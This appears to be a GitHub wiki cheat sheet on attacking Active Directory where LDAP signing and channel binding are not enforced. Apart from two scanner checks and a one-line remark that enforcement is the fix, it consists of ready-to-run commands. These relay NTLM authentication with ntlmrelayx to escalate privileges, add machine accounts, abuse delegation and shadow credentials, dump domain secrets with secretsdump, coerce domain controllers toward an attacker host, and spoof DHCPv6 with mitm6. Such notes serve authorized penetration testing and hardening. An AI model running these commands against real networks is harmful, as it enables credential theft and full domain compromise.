LDAP Signing - CraigDonkin/Infrastructure GitHub Wiki
nxc.exe ldap <server> -u <username> -p <password> -M ldap-checker
python3 LdapRelayScan.py -method LDAPS -dc-ip <ip> -u <username> -p <password>
https://github.com/zyn3rgy/LdapRelayScan
Both checks report whether the DC enforces LDAP signing and LDAPS channel binding; the relay steps below only succeed where those protections are not enforced, so enforcing them is the fix.
- Relay to enumerate information
python3 ntlmrelayx.py -t ldap://<DC IP>
- If relaying from SMB
python3 ntlmrelayx.py -t ldap://<DC IP> -smb2support
- Relay to escalate privileges, for example when relaying a Domain Admin (DA)
python3 ntlmrelayx.py -t ldap://<DC IP> --escalate-user <username>
- Interactive LDAP shell
python3 ntlmrelayx.py -t ldaps://<DC IP> -i
- Add a computer to domain
python3 ntlmrelayx.py -t ldaps://<DC IP> --add-computer <computername>
- RBCD
python3 ntlmrelayx.py -t ldaps://<DC IP> --delegate-access
getST.py -spn CIFS/<server name> '<computer you created>$' -impersonate <user to impersonate>
export KRB5CCNAME=<blah.ccache>
secretsdump.py -k -no-pass <dc>
- Shadow Credential attack
python3 ntlmrelayx.py -t ldaps://<DC IP> --shadow-credentials
python3 gettgtpkinit.py -cert-pfx <pfx> -pfx-pass <password> <computer>$ <output.ccache>
export KRB5CCNAME=<output.ccache>
python3 getnthash.py '$' -key
- Remove MIC (NTLMv1), then perform RBCD attack
python3 ntlmrelayx.py -t ldaps://<DC IP> --remove-mic -smb2support --delegate-access
getST.py -spn cifs/[RELAYED DC] -impersonate [DOMAIN ADMIN] [CREATED COMPUTER]':[PASSWORD]
- PetitPotam/DFSCoerce/PrinterBug etc.
python3 PetitPotam.py -u <username> -p <password> -d <domain name> <attackerhost> <victim>
python3 dfscoerce.py -u <username> -p <password> -d <domain name> -dc-ip <dc-ip> <attackerhost> <victim>
python printerbug.py <DOMAIN/USER:PASSWORD@TARGET> <attackerhost>
- MITM6
sudo mitm6 -d <domain> --ignore-nofqdn
- WebClient
python3 PetitPotam.py -u <username> -p <password> -d <domain name> <attackerhost>@80/abc <victim>